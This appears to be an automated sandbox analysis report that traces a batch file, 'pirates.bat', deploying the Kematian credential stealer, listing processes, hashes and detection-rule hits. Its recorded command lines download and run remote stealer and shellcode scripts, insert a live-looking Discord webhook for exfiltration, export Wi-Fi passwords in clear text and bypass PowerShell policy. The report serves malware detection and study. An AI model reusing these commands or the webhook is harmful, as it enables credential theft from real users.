                                        Start time:00:25:56
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:00:25:56
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff71e800000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:9
                                        Start time:00:25:58
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:13
                                        Start time:00:25:59
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:14
                                        Start time:00:26:01
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:15
                                        Start time:00:26:02
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\chcp.com
                                        Wow64 process (32bit):false
                                        Commandline:chcp 65001
                                        Imagebase:0x7ff7e47b0000
                                        File size:14'848 bytes
                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:00:26:02
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell.exe -nop -c "Write-Host -NoNewLine $null"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:17
                                        Start time:00:26:04
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:18
                                        Start time:00:26:05
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\net.exe
                                        Wow64 process (32bit):false
                                        Commandline:net session
                                        Imagebase:0x7ff641d50000
                                        File size:59'904 bytes
                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:19
                                        Start time:00:26:05
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\net1.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\net1 session
                                        Imagebase:0x7ff612a00000
                                        File size:183'808 bytes
                                        MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:00:26:05
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        General

                                        Target ID:22
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\doskey.exe
                                        Wow64 process (32bit):false
                                        Commandline:doskey CALL=SHIFT
                                        Imagebase:0x7ff6c6cc0000
                                        File size:20'480 bytes
                                        MD5 hash:F6D134052BCB12103B729E4D2EA15B91
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:23
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\attrib.exe
                                        Wow64 process (32bit):false
                                        Commandline:attrib +h +s kematian.ps1
                                        Imagebase:0x7ff6d3870000
                                        File size:23'040 bytes
                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:24
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:25
                                        Start time:00:26:09
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:26
                                        Start time:00:26:10
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:27
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:28
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:29
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:30
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:31
                                        Start time:00:26:11
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:33
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\findstr.exe
                                        Wow64 process (32bit):false
                                        Commandline:findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff768c20000
                                        File size:36'352 bytes
                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:34
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
                                        Imagebase:0x7ff6317b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:35
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /i "C:\Users\user\Desktop\pirates.bat"
                                        Imagebase:0x7ff62f140000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:36
                                        Start time:00:26:16
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:39
                                        Start time:00:26:26
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:wscript /b
                                        Imagebase:0x7ff604250000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:40
                                        Start time:00:26:26
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:false

                                        General

                                        Target ID:41
                                        Start time:00:26:28
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff693ab0000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:43
                                        Start time:00:26:34
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\netsh.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
                                        Imagebase:0x7ff749760000
                                        File size:96'768 bytes
                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:44
                                        Start time:00:26:36
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_KematianStealer, Description: Yara detected Kematian Stealer, Source: 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_KematianStealer, Description: Yara detected Kematian Stealer, Source: 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        General

                                        Target ID:45
                                        Start time:00:26:38
                                        Start date:05/07/2024
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
                                        Imagebase:0x7ff7735b0000
                                        File size:2'759'232 bytes
                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:46
                                        Start time:00:26:39
                                        Start date:05/07/2024
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
                                        Imagebase:0x7ff752310000
                                        File size:52'744 bytes
                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:48
                                        Start time:00:26:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Go lang
                                        Yara matches:
                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FFD9BAA4C49 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.1785844023.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_7ffd9baa0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c591b5661a1c0fdc754d495c535afdacd33bcfbb0e39c489b18cb459d002ba4
                                          • Instruction ID: a28fd030ebebfb3b282555a72b3cdb68d34b6d858e5febf81f25c9a0bcae1bb4
                                          • Opcode Fuzzy Hash: 6c591b5661a1c0fdc754d495c535afdacd33bcfbb0e39c489b18cb459d002ba4
                                          • Instruction Fuzzy Hash: 1C01847160CB094FDB58DE1CA495975B7E1EBA9325F00066EF08AC22A2DA66E842C741
                                          Function 00007FFD9BAA34B5 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.1785844023.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_7ffd9baa0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction ID: 6feb4121a9d25eac1f15d439ff6a8d77b5333c26e97a1398700db08024774f40
                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction Fuzzy Hash: 2401677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5D636E882CB45
                                          Function 00007FFD9BAA4C5E Relevance: .0, Instructions: 44COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.1785844023.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_20_2_7ffd9baa0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8fc34e6be3b8646702bd3baa43ed820e257c3aa4c35b091b7bbd2dfc4ddb1e0e
                                          • Instruction ID: 4275cb5ad16d259d6ebe8a8e2a7c15c399204b8c19ad3cbcd8ef834f9735529b
                                          • Opcode Fuzzy Hash: 8fc34e6be3b8646702bd3baa43ed820e257c3aa4c35b091b7bbd2dfc4ddb1e0e
                                          • Instruction Fuzzy Hash: 8CF0127160C7444FDB58EA1CE891969B7E0EB99335F10065EF0CAC36A6D626E442CB46

                                          Executed Functions

                                          Function 00007FFD9BBA0001 Relevance: .6, Instructions: 637COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001F.00000002.1837400787.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_31_2_7ffd9bba0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 38d60cdde3c03264e43906924a342d052fe09cfad35019898c7cd52f47ff280d
                                          • Instruction ID: 3ef992d92403ec444bfd4797dbabf0ee5cb36e1fb896517f0bf46e8e2a21c93a
                                          • Opcode Fuzzy Hash: 38d60cdde3c03264e43906924a342d052fe09cfad35019898c7cd52f47ff280d
                                          • Instruction Fuzzy Hash: 6D121522E0FBCA0FE76697B848755A47FE0EF56654B4A01FBD08CCB1E3D918AD068351
                                          Function 00007FFD9BAD3F05 Relevance: .5, Instructions: 499COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001F.00000002.1836959951.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_31_2_7ffd9bad0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed0e6c13dd9cb6823222356a1b76b03007cefff9b2874daafe24578ae5db9d58
                                          • Instruction ID: 90ef42c555191db9434c3068b7911d48a137cf37a3e042a5d240b82a537819fc
                                          • Opcode Fuzzy Hash: ed0e6c13dd9cb6823222356a1b76b03007cefff9b2874daafe24578ae5db9d58
                                          • Instruction Fuzzy Hash: 6BF1D630A08A4D8FDF98DF5CC455AA97BF1FFA9310F1542AAE449C72A6CE64E841C780
                                          Function 00007FFD9BBA01BA Relevance: .4, Instructions: 364COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001F.00000002.1837400787.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_31_2_7ffd9bba0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 80e9c089d456bd969d96b5e8ca3e479d23403e1f705a1fbf696a47ab1f15b59c
                                          • Instruction ID: 8d344fab980d5656c3a5dfcd8648758e0c0850cc08ff1b0ee3c9beee7b7877e7
                                          • Opcode Fuzzy Hash: 80e9c089d456bd969d96b5e8ca3e479d23403e1f705a1fbf696a47ab1f15b59c
                                          • Instruction Fuzzy Hash: F5B1F622E0EB890FD7A69BA848745B53FE0FF56614F4A01FAD04CCB1E3D918AD468351

                                          Non-executed Functions

                                          Function 00007FFD9BAD1188 Relevance: .3, Instructions: 289COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001F.00000002.1836959951.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_31_2_7ffd9bad0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66149b9ba7c5c828fd690f8f81bdc02960f90a48376c3c2a9f1121535fc48f79
                                          • Instruction ID: 1079917db3e3f5fe59f5ebb6651cb9b192b79eb078a89a9b5ef86619710e5e21
                                          • Opcode Fuzzy Hash: 66149b9ba7c5c828fd690f8f81bdc02960f90a48376c3c2a9f1121535fc48f79
                                          • Instruction Fuzzy Hash: D591A467F0F6D65FF76247AC58760E53FA0EFA326470B02F7C088CA0B3D85A69468251

                                          Executed Functions

                                          Function 00007FFD9BAD33B5 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000024.00000002.1960939003.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_36_2_7ffd9bad0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction ID: c6d341720b75168737bcbbb658bbc6ed62dea96e630f77678b5119a0e236c73e
                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                          • Instruction Fuzzy Hash: EF01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10066DE58AC76A5DA36E882CB45

                                          Executed Functions

                                          Function 00007FFD9BAC6330 Relevance: 1.6, Strings: 1, Instructions: 379COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000002C.00000002.2219364540.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_44_2_7ffd9bac0000_powershell.jbxd
                                          Similarity
